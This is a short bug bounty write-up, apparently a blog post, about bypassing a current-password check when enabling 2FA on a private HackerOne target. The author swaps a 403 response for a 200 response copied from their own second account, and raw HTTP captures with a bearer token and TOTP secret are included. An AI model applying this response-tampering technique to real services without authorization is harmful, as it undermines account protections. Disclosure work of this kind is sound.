Bypassing Current Password
This post is about how I bypassed current password during enabling of 2fa in a h1 private program
So lets come to the details
I went to the settings page and navigated to the 2fa section
It asked me to enter current password , I entered a random password and intercepted the request with
BURP .The request looks like below
OST /v1/otp/provision HTTP/1.1
Host: private.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.private.com/account-settings/2fa
authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzZXNzaW9uX2lkIjoiSzdvSzlxTmZUcFotTVpPUURkVm11LTVRaFdHZmxIQkciLCJ1c2VyX2lkIjoieWtyNlQ1Q1hXZ2l1bDRmdnZNak5meXdIQTlHdlp2T0oiLCJ0ZWFtX2lkIjoiOTl4dzhOa3BxQkdSY2J3ejV5WXlMSUVpbVQ4R3ZPOUwiLCJuZWVkc19vdHAiOmZhbHNlLCJyZWFkX29ubHkiOmZhbHNlLCJoYXNfY29udHJhY3QiOmZhbHNlLCJlbnRpdGxlbWVudHMiOnsiaGFzX2NvbnRyYWN0IjpmYWxzZSwiaXNfZW1lcmdlbmN5X3N1cHBvcnRfYWxsb3dlZCI6ZmFsc2UsImlzX3NhbWxfYWxsb3dlZCI6ZmFsc2UsImlzX3N1cHBvcnRfdGlja2V0X2FsbG93ZWQiOmZhbHNlLCJzbGFfcmVzcG9uc2VfdGltZSI6ZmFsc2V9LCJpYXQiOjE1MjI3NzA1Njl9.qD11Xivy35IoJpE6tOqOtplJb0rHlXo2tzlCTHVCWJU
content-type: application/json
origin: https://www.private.com/
Content-Length: 25
Connection: close
{"password":"randompassword"}Host: private.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.private.com/account-settings/2fa
authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzZXNzaW9uX2lkIjoiSzdvSzlxTmZUcFotTVpPUURkVm11LTVRaFdHZmxIQkciLCJ1c2VyX2lkIjoieWtyNlQ1Q1hXZ2l1bDRmdnZNak5meXdIQTlHdlp2T0oiLCJ0ZWFtX2lkIjoiOTl4dzhOa3BxQkdSY2J3ejV5WXlMSUVpbVQ4R3ZPOUwiLCJuZWVkc19vdHAiOmZhbHNlLCJyZWFkX29ubHkiOmZhbHNlLCJoYXNfY29udHJhY3QiOmZhbHNlLCJlbnRpdGxlbWVudHMiOnsiaGFzX2NvbnRyYWN0IjpmYWxzZSwiaXNfZW1lcmdlbmN5X3N1cHBvcnRfYWxsb3dlZCI6ZmFsc2UsImlzX3NhbWxfYWxsb3dlZCI6ZmFsc2UsImlzX3N1cHBvcnRfdGlja2V0X2FsbG93ZWQiOmZhbHNlLCJzbGFfcmVzcG9uc2VfdGltZSI6ZmFsc2V9LCJpYXQiOjE1MjI3NzA1Njl9.qD11Xivy35IoJpE6tOqOtplJb0rHlXo2tzlCTHVCWJU
content-type: application/json
origin: https://www.private.com/
Content-Length: 25
Connection: close
The response is as below
HTTP/1.1 403 Forbidden
Date: Tue, 03 Apr 2018 16:07:51 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 33
Connection: close
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-RateLimit-Limit: 10000
X-RateLimit-Remaining: 9999
ETag: W/"21-jJ8Jp4x8JRBrLHxO/fYEkk5Y3X4"
Date: Tue, 03 Apr 2018 16:07:51 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 33
Connection: close
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-RateLimit-Limit: 10000
X-RateLimit-Remaining: 9999
ETag: W/"21-jJ8Jp4x8JRBrLHxO/fYEkk5Y3X4"
{"error":{"message":"Forbidden"}}
HTTP/1.1 200 OK
Date: Tue, 03 Apr 2018 15:54:24 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 4276
Connection: close
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-RateLimit-Limit: 10000
X-RateLimit-Remaining: 9999
ETag: W/"10b4-h/c+lItVL4KULZt2cYWI3FRPF18"
Date: Tue, 03 Apr 2018 15:54:24 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 4276
Connection: close
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-RateLimit-Limit: 10000
X-RateLimit-Remaining: 9999
ETag: W/"10b4-h/c+lItVL4KULZt2cYWI3FRPF18"
{"qr_code":"data:image/png;base64,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","secret":"JZGXSMSLOY2GGNRT"}
What I did was , I used another account of mine and entered correct password and copied that response and pasted it in the victim account and then forwarded the request
By this I successfully bypassed the current password and I also checked if scanning the QR code works but it was not working
The team still said it will need to be fixed and rewarded me 200$
Thanks for reading!!
congrats on ur first
ReplyDeleteIts not my first bug but its my first on hackerone :)
Delete